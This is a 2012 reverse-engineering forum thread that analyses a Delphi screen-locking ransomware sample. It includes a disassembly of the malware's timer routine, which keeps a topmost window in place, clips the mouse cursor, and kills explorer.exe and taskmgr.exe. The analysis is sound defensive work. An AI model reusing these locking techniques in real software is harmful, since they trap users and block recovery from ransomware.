A forum for reverse engineering, OS internals and malware analysis 

Discussion on reverse-engineering and debugging.
 #15900  by Buster_BSA
 Sat Oct 06, 2012 10:33 pm
Attached there is a russian ransomware coded in Delphi. I would like to know what APIs (if any) are involved in the locking screen mechanism.

How the ALT+TAB is intercepted? I have seen some malwares use RegisterHotKey API but this one is not using that trick.
How the malware avoids the mouse cursor reaches the taskbar?

Thanks in advance!
Attachments
password: infected
(224.28 KiB) Downloaded 47 times
 #15911  by Buster_BSA
 Sun Oct 07, 2012 5:13 pm
nullptr wrote:Here's the sample dumped.
The import table tells all. :)
Sorry but I do not see anything that could be used to capture Alt+Tab. :?
 #15913  by EP_X0FF
 Sun Oct 07, 2012 6:07 pm
It doesnt block Alt+Tab. It changes position of its own full screen form via short interval configured timer (50ms). If it were blocking Alt+Tab, then it will be unavailable on other desktops, while it is not.

From nullptr dump.
Code: Select all
UPX1:0045256C _TForm1_Timer1Timer proc near           ; DATA XREF: UPX1:00451D13o
UPX1:0045256C
UPX1:0045256C var_1C          = byte ptr -1Ch
UPX1:0045256C
UPX1:0045256C                 push    ebx
UPX1:0045256D                 push    esi
UPX1:0045256E                 push    edi
UPX1:0045256F                 add     esp, 0FFFFFFF0h
UPX1:00452572                 mov     ebx, eax
UPX1:00452574                 mov     edi, offset dword_455BB8
UPX1:00452579                 push    13h             ; uFlags
UPX1:0045257B                 mov     eax, [ebx+4Ch]
UPX1:0045257E                 push    eax             ; cy
UPX1:0045257F                 mov     eax, [ebx+48h]
UPX1:00452582                 push    eax             ; cx
UPX1:00452583                 mov     eax, [ebx+44h]
UPX1:00452586                 push    eax             ; Y
UPX1:00452587                 mov     eax, [ebx+40h]
UPX1:0045258A                 push    eax             ; X
UPX1:0045258B                 push    0FFFFFFFFh      ; hWndInsertAfter
UPX1:0045258D                 mov     eax, ebx
UPX1:0045258F                 call    @Controls@TWinControl@GetHandle$qqrv ; Controls::TWinControl::GetHandle(void)
UPX1:00452594                 push    eax             ; hWnd
UPX1:00452595                 call    j_SetWindowPos
UPX1:0045259A                 mov     eax, [edi]
UPX1:0045259C                 mov     esi, [eax+44h]
UPX1:0045259F                 mov     eax, esi
UPX1:004525A1                 mov     edx, [edi]
UPX1:004525A3                 add     eax, [edx+4Ch]
UPX1:004525A6                 sub     eax, 0
UPX1:004525A9                 push    eax
UPX1:004525AA                 lea     eax, [esp+20h+var_1C]
UPX1:004525AE                 push    eax
UPX1:004525AF                 mov     eax, [edi]
UPX1:004525B1                 mov     ebx, [eax+40h]
UPX1:004525B4                 mov     ecx, ebx
UPX1:004525B6                 mov     eax, [edi]
UPX1:004525B8                 add     ecx, [eax+48h]
UPX1:004525BB                 sub     ecx, 0
UPX1:004525BE                 mov     edx, esi
UPX1:004525C0                 mov     eax, ebx
UPX1:004525C2                 call    sub_412A5C
UPX1:004525C7                 push    esp             ; lpRect
UPX1:004525C8                 call    j_ClipCursor
UPX1:004525CD                 mov     eax, offset _str_explorer_exe_0.Text
UPX1:004525D2                 call    FindAndKillProcess
UPX1:004525D7                 mov     eax, offset _str_taskmgr_exe.Text
UPX1:004525DC                 call    FindAndKillProcess
UPX1:004525E1                 add     esp, 10h
UPX1:004525E4                 pop     edi
UPX1:004525E5                 pop     esi
UPX1:004525E6                 pop     ebx
UPX1:004525E7                 retn
UPX1:004525E7 _TForm1_Timer1Timer endp